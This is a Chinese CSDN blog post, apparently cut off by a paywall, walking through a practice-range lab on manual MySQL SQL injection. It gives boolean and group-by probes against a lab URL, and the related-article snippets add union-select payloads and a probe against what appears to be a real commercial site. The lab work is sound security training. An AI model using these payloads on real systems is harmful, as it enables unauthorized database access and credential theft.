【墨者学院】MySQL数据库手工注入漏洞(详细篇)

已于 2022-11-12 22:52:44 修改
阅读量892 收藏 1
点赞数
分类专栏: web安全 漏洞学习 sql注入 文章标签: web安全 mysql 数据库
于 2022-11-12 22:28:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71487689/article/details/127825824
版权
本文详述了如何在存在SQL注入可能性的用户登录界面进行测试和信息收集,通过改变URL参数引发不同响应,判断SQL注入漏洞。利用group by进行列数探测,通过version()、database()等函数获取数据库版本、名称和用户信息。进一步探索information_schema获取表名和列名,并通过SQL注入尝试获取账号表中的登录凭据,最终实现对系统的非法访问。
摘要由CSDN通过智能技术生成

  1.  首先进入靶场给的网址,发现是一个用户登录界面,这里就需要进行sql注入测试并MySQL数据库的信息收集

(1) 判定有没有sql注入可能。查看网页源代码

(2)发现存在变量id,那么进行测试:

        http://124.70.22.208:47350/new_list.php?id=1 and 1=1        正常页面

        http://124.70.22.208:47350/new_list.php?id=1 and 1=2(随便输也行)网页报错

        可能存在sql注入漏洞

         

(3) 进行信息收集

  •  group by 1/2/3/...        查看表的列数,5 报错,说明表中有4列
http://124.70.22.208:47350/new_list.
最低0.47元/天 解锁文章
giegie463
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法。通过这些实战案例的学习,可以更好地理解Web应用的安全性问题及其解决方案。 #### 二、抓包与闭合方式判断 1. **抓包操作**...
Mysql SQL注入漏洞
weixin_34060741的博客
06-17 208
学习网址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html      https://www.cnblogs.com/sdya/p/4568548.html 网络安全:网络攻击技术——Broken authentication      网络攻击技术(三)——Denial Of Service      网络攻击技术(二...
SQL注入漏洞mySQL基础
goldfish8848的博客
06-24 871
本文主要介绍数据库相关的基础知识,对之后SQL注入漏洞的学习有很大帮助
MySql注入漏洞
weixin_44906495的博客
04-20 1518
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行.      1...
漏洞-MySQL注入
山下南徒的博客
07-10 491
确定使用了MySQL PHP程序一般搭配MySQL http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--+True http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--False 由注释符判定数据库MySQL。 引发报错信息 page.php?id=' String concatenation(字符串连接) http://dy
mysql注入漏洞_WEB 安全学习 一、mysql 注入漏洞
weixin_29009881的博客
02-08 205
转载: https://www.cnblogs.com/cui0x01/p/8620524.html一、Mysql数据库结构数据库A表名列名数据数据库B表名列名数据Mysql5.0以上自带数据库:information_schemainformation_schema:存储mysql下所有信息的数据库(数据库名,表名,列名)参数及解释database():数据库名user():数据库用户versi...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者未必黑.pdf
12-26
如果您能提供更具体的文件内容或者详细信息,我将能更好地帮助您生成详细的知识点。 不过,既然您提到了标题为“近墨者未必黑”,这是一个常用的成语,其含义是指周围环境或周围的人对一个人的影响并不是绝对的,一...
最新MySQL数据库漏洞情况通报
12-15
近日,互联网上披露了关于MySQL数据库存在代码执行漏洞( CNNVD-201609-183 )的情况。由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器。目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息。 一、漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。 MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞漏洞编号:CNNVD-201609-183,CVE-2016-6662),以下版本受到该漏洞影响:MySQL 5.7
MySQL数据库渗透及漏洞利用总结
05-09 4193
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
SQL注入漏洞Mysql与MSSQL特性)
errorr0
07-01 618
Mysql与MSSQL的特性
墨者mysql注入_墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_39966644的博客
01-19 231
登录平台靶靶场后会发现底部有个通知点进去之后会发现URL中带有?id这地方八成是可以注入的先尝试了一下在tingjigonggao后面加'号结果发下报错了看这提示应该是sql语句错误然后尝试了下加上‘ and ’1‘=’1 结果回显是正常的,加上‘ and 1=1 报错说明这里是一个字符型的注入,当然这个靶场的题目也已经提示了这次的sql注入会是一个字符型注入接下来就是测试字段数了这里我一开始尝试...
13 WEB漏洞:SQL注入MYSQL注入
qq_52718293的博客
04-29 2103
SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下: information_schema.tables:记录所有表名信息的表 information_schema.columns:记录所有列名信息的表 table_name:表名
Web漏洞-mysql注入
qq_54190167的博客
03-20 869
web漏洞mysql注入
针对mysql的sql注入漏洞测试(MySql版)
白瞳洛的博客
08-11 652
我们先来判断下这个表中有几个字段使用 order by1以上的,如果说页面不正常了,肯定就超过这个数了,比如我们使用6来。6报错那就表述这个字段只有5个了。 id=1 order by 6# id=1-1 union select 1,2,3,4,5#--下面获取每个字段 我们换成user(),@@version数据库版本,database()当前使用的数据库,@@basedirmysql的安装路径,随后会返回一些敏感信息 id=1-1 union select user(),@@v...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值